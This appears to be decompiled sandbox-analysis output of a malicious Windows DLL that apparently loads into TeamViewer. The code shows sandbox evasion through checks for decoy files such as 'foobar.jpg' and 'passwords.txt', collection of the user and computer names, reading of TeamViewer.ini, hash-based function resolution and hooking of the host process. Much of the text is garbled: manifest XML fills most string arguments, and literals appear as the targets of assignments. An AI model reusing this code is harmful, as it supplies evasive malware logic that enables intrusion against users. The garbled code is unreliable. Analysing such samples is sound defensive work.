    						"     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t347;
    						M6ECB052C = GetModuleFileNameA(_a4, _t347, 0x104);
    						_t350 = HeapAlloc(GetProcessHeap(), 8, 0x105);
    						_t494 = M6ECB052C; // 0x21
    						M6ECB0524 = _t350;
    						RtlMoveMemory(_t350, "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", _t494);
    						_t351 = M6ECB0524; // 0xcd1c70
    						M6ECB0528 = E6ECAA360(_t351, 0, 0);
    						PathRemoveFileSpecA("     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD");
    						PathAddBackslashA("     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD");
    						SetCurrentDirectoryA("     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"); // executed
    						_t357 = E6ECAA360("     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", 0, 0);
    						_t602 =  &_v936 + 0x18;
    						M6ECB0520 = _t357; // executed
    						__imp__SHGetSpecialFolderPathA(0,  &_v276, 0, 0); // executed
    						if(_t357 != 0) {
    							PathAddBackslashA( &_v292);
    							_v948 = 0x626f6f66;
    							_v944 = 0x6a2e7261;
    							_v940 = 0x6770;
    							_v938 = 0;
    							wsprintfA( &_v556, "%s%s",  &_v292,  &_v948);
    							_t624 = _t602 + 0x10;
    							_t480 = GetFileAttributesA( &_v548); // executed
    							if(_t480 != 0xffffffff) {
    								ExitProcess(0);
    							}
    							_v956 = 0x74646f2e;
    							_v952 = 0;
    							wsprintfA( &_v548, "%s%s%s",  &_v284,  &_v940,  &_v956);
    							_t602 = _t624 + 0x14;
    							_t484 = GetFileAttributesA( &_v540); // executed
    							if(_t484 != 0xffffffff) {
    								_v947 = 0x7472;
    								_v945 = 0x66;
    								wsprintfA( &_v540, "%s%s%s",  &_v276,  &_v932,  &_v948);
    								_t602 = _t602 + 0x14;
    								if(GetFileAttributesA( &_v532) != 0xffffffff) {
    									_v844 = 0x73736170;
    									_v840 = 0x64726f77;
    									_v836 = 0x73;
    									_v939 = 0x7874;
    									_v937 = 0x74;
    									wsprintfA( &_v532, "%s%s%s",  &_v268,  &_v844,  &_v940);
    									_t602 = _t602 + 0x14;
    									if(GetFileAttributesA( &_v524) == 0xffffffff) {
    										goto L11;
    									} else {
    										ExitProcess(0);
    									}
    								}
    							}
    						}
    						L11:
    						_t359 = HeapAlloc(GetProcessHeap(), 8, 0x105);
    						M6ECB0530 = _t359;
    						_t360 = GetModuleFileNameA(0, _t359, 0x104);
    						_t537 = M6ECB0530; // 0xcb2c98
    						M6ECB0538 = _t360;
    						M6ECB053C = PathFindFileNameA(_t537);
    						_t362 = M6ECB0530; // 0xcb2c98
    						_t363 = E6ECAA360(_t362, 0, 0);
    						M6ECB0534 = _t363;
    						L6ECAC2EE();
    						 *0x6ecb0278 = 0x11c;
    						L6ECAC34E();
    						M6ECB0548 = E6ECA3280(0);
    						_t365 = E6ECA3220(0);
    						_t604 = _t602 + 0x14;
    						M6ECB0544 = _t365;
    						__imp__WTSGetActiveConsoleSessionId(0x6ecb0278, 0x6ecb0278, 0x11c);
    						M6ECB04E8 = _t365;
    						_t366 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xf30000
    						if( *_t366 != 0x5a4d) {
    							goto L131;
    						} else {
    							_t592 =  *((intOrPtr*)(_t366 + 0x3c)) + _t366;
    							if( *_t592 != 0x4550) {
    								goto L131;
    							} else {
    								_v860 =  *((intOrPtr*)(_t592 + 0x58));
    								_v976 =  *(_t592 + 8);
    								_v844 = 0x104;
    								_t369 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
    								M6ECB04F8 = _t369;
    								if(_t369 != 0) {
    									_t474 = GetUserNameW(_t369,  &_v844); // executed
    									if(_t474 == 0) {
    										_t475 = M6ECB04F8; // 0xcd21b8
    										 *_t475 = 0;
    									}
    								}
    								_v856 = 0x104;
    								_t371 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
    								M6ECB0504 = _t371;
    								if(_t371 != 0) {
    									__imp__GetComputerNameExW(3, _t371,  &_v856); // executed
    									_t371 = M6ECB0504; // 0xcd3fb0
    									if(_t371 == 0) {
    										 *_t371 = 0;
    										_t371 = M6ECB0504; // 0xcd3fb0
    									}
    								}
    								_t498 = M6ECB04F8; // 0xcd21b8
    								if(_t498 != 0) {
    									M6ECB04F4 = E6ECAA2F0(_t498, 0, 0);
    									_t371 = M6ECB0504; // 0xcd3fb0
    									_t604 = _t604 + 0xc;
    								}
    								if(_t371 != 0) {
    									_t472 = E6ECAA2F0(_t371, 0, 0);
    									_t604 = _t604 + 0xc;
    									M6ECB0500 = _t472;
    								}
    								_t373 = HeapAlloc(GetProcessHeap(), 8, 0x105);
    								M6ECB04CC = _t373;
    								if(_t373 != 0) {
    									wsprintfA(_t373, "%s%s%s", "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", "TeamViewer", ".ini");
    									_t567 = M6ECB04CC; // 0xcb2da8
    									_t471 = E6ECAA360(_t567, 0, 0);
    									_t604 = _t604 + 0x20;
    									M6ECB04D0 = _t471;
    								}
    								if(_v860 == 0x435a88 || _v976 == 0x4b4ca51f) {
    									_push( &M6ECB04F0);
    									"\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = 1;
    									M6ECB04AC = E6ECA3390();
    									_t375 = E6ECA1D50(0x77d938, _t592);
    									M6ECB0580 = _t375;
    									M6ECB0518 = _t375;
    									M6ECB054C = E6ECA1D50(0x7b16d4, _t592);
    									M6ECB0570 = E6ECA1D50(0x7b7db0, _t592);
    									M6ECB0550 = E6ECA1D50(0x7725be, _t592);
    									M6ECB0554 = E6ECA1D50(0x7725bc, _t592);
    									M6ECB0574 = E6ECA1D50(0x7b701c, _t592);
    									M6ECB0578 = E6ECA1D50(0x7a2d08, _t592);
    									M6ECB057C = E6ECA1D50(0x7b70d8, _t592);
    									M6ECB0558 = E6ECA1D50(0x7a304c, _t592);
    									M6ECB055C = E6ECA1D50(0x749a58, _t592);
    									M6ECB0560 = E6ECA1D50(0x74b970, _t592);
    									"voker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = E6ECA1D50(0x7b0408, _t592);
    									M6ECB0568 = E6ECA1D50(0x77ec48, _t592);
    									M6ECB056C = E6ECA1D50(0x74cddc, _t592);
    									_t390 = E6ECAA2F0(E6ECA1D50(0x7b4550, _t592), 0, 0);
    									M6ECB04DC = _t390;
    									M6ECB04E0 = lstrlenA(_t390);
    									M6ECB0584 = E6ECA1D50(0x77a5b8, _t592);
    									M6ECB04D8 = E6ECAA2F0(E6ECA1D50(0x7ad0d4, _t592), 0, 0);
    									M6ECB04D4 = E6ECAA2F0(E6ECA1D50(0x7adf00, _t592), 0, 0);
    									M6ECB0588 = E6ECA1D50(0x772a50, _t592);
    									 *0x6ecb047c = E6ECAA2F0(E6ECA1D50(0x772af0, _t592), 0, 0);
    									_t400 = GetCommandLineA();
    									_t499 =  &_v868;
    									_v868 = 0;
    									_t596 = E6ECAA3D0(_t400,  &_v868);
    									_t609 = _t604 + 0xdc;
    									if(_t596 != 0) {
    										CharLowerA( *_t596);
    										_t566 = _v868;
    										if(_t566 > 1) {
    											_t587 = 1;
    											do {
    												if(_t587 >= _t566 - 1) {
    													L34:
    													_t467 =  *((intOrPtr*)(_t596 + _t587 * 4));
    													_t499 =  *_t467;
    													__eflags = _t499 - 0x6b;
    													if(_t499 != 0x6b) {
    														L37:
    														__eflags = _t499 - 0x66;
    														if(_t499 == 0x66) {
    															__eflags =  *(_t467 + 1);
    															if( *(_t467 + 1) == 0) {
    																M6ECB04B8 = 1;
    															}
    														}
    													} else {
    														__eflags =  *(_t467 + 1);
    														if( *(_t467 + 1) != 0) {
    															goto L37;
    														} else {
    															M6ECB04B4 = 1;
    														}
    													}
    												} else {
    													_t468 =  *((intOrPtr*)(_t596 + _t587 * 4));
    													if( *_t468 != 0x77 ||  *((intOrPtr*)(_t468 + 1)) != 0) {
    														goto L34;
    													} else {
    														_t499 =  *(_t596 + 4 + _t587 * 4);
    														_t587 = _t587 + 1;
    														_t469 = StrToIntA(_t499);
    														_t566 = _v868;
    														M6ECB0514 = _t469;
    													}
    												}
    												_t587 = _t587 + 1;
    											} while (_t587 < _t566);
    										}
    										LocalFree(_t596);
    									}
    									_push(8);
    									_push(0x6ecb0398);
    									L6ECAC2EE();
    									E6ECA2140(_t499, "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", 1);
    									_t403 = M6ECB04F0; // 0x0
    									_t500 = M6ECB0500; // 0xcc63c8
    									_t540 = M6ECB04F4; // 0xcbe878
    									_t404 = E6ECA3180(_t540, _t500, _t403);
    									_t502 = M6ECB04F0; // 0x0
    									_v972 = 0x6467;
    									_v970 = 0;
    									M6ECB04E4 = _t404 % 0x7fffffff;
    									_t543 = M6ECB04CC; // 0xcb2da8
    									_t407 = GetPrivateProfileIntA(_t502,  &_v972, 0, _t543);
    									_t544 = M6ECB0524; // 0xcd1c70
    									M6ECB04BC = _t407;
    									"embly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = GetModuleHandleA(_t544);
    									_t410 = GetModuleHandleA(E6ECA1D50(0x77146c, _t592));
    									_push(0x435a88);
    									_t597 = _t410;
    									_push(1);
    									_push( &_v968);
    									_push(_t597);
    									_v968 = 0x3f82e705;
    									_v964 = 0;
    									_v960 = 0;
    									_v956 = 0;
    									E6ECA1DB0();
    									_t413 = _v956;
    									_t612 = _t609 + 0x2c;
    									if(_t413 != 0) {
    										M6ECB058C = _t413;
    									}
    									_t415 = E6ECAA2F0(E6ECA1D50(0x77d760, _t592), 0, 0);
    									_t503 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
    									_t580 = _t415;
    									wsprintfA( &_v576, "%s%s", _t503, _t580);
    									_t613 = _t612 + 0x24;
    									HeapFree(GetProcessHeap(), 0, _t580);
    									_t419 =  &_v568;
    									_push(_t419);
    									M6ECB058C();
    									M6ECB04A8 = _t419;
    									if(E6ECAB4C0() != 0) {
    										ExitProcess(0);
    									}
    									_push(8);
    									_push( &_v856);
    									M6ECB0614 = 1;
    									L6ECAC2EE();
    									_v864 = 8;
    									_v876 = 0;
    									if(NtQuerySystemInformation(0x67,  &_v864, 8,  &_v876) < 0 || _v892 != 8 || (_v876 & 0x00000002) == 0) {
    										_t582 = 0;
    									} else {
    										_t582 = 1;
    										_v996 = 1;
    									}
    									if(_t597 != 0) {
    										_push(0x435a88);
    										_push(1);
    										_push( &_v988);
    										_push(_t597);
    										_v988 = 0x2e136e83;
    										_v984 = 0;
    										_v980 = 0;
    										_v976 = 0;
    										E6ECA1DB0();
    										_t461 = _v976;
    										_t623 = _t613 + 0x10;
    										if(_t461 != 0) {
    											"Level>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t461;
    										}
    										_t96 = _t582 + 0x435a88; // 0x435a88
    										_v988 = 0xa1acb3a1;
    										_v984 = E6ECA7C40;
    										_v980 =  &M6ECB05A4;
    										_v976 = 0;
    										_v972 = 0xd9ef7edb;
    										_v968 = E6ECA78B0;
    										_v964 =  &M6ECB0594;
    										_v960 = 0;
    										_v956 = 0x75da5974;
    										_v952 = E6ECA7C20;
    										_v948 =  &M6ECB05A0;
    										_v944 = 0;
    										_v940 = 0x2a081f08;
    										_v936 = E6ECA8230;
    										_v932 =  &M6ECB05F8;
    										_v928 = 0;
    										_v924 = 0x71e40fdf;
    										_v920 = E6ECA82C0;
    										_v916 =  &M6ECB05FC;
    										_v912 = 0;
    										E6ECA1FA0(_t597,  &_v988, 5, _t96);
    										_t613 = _t623 + 0x10;
    									}
    									_t423 = E6ECA1D50(0x771704, _t592);
    									_t505 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
    									wsprintfA( &_v596, "%s%s", _t505, _t423);
    									_t614 = _t613 + 0x18;
    									_t425 =  &_v588;
    									_push(_t425);
    									M6ECB058C();
    									M6ECB0490 = _t425;
    									if(_t425 != 0) {
    										_v864 = 0x1ee4afd;
    										_v860 = E6ECA7F10;
    										_v856 =  &M6ECB05E8;
    										_v852 = 0;
    										_v848 = 0xcd967670;
    										_v844 = E6ECA80B0;
    										_v840 =  &M6ECB05EC;
    										_v836 = 0;
    										_v832 = 0xc640750c;
    										_v828 = E6ECA8100;
    										_v824 =  &M6ECB05F0;
    										_v820 = 0;
    										_v816 = 0x856c5686;
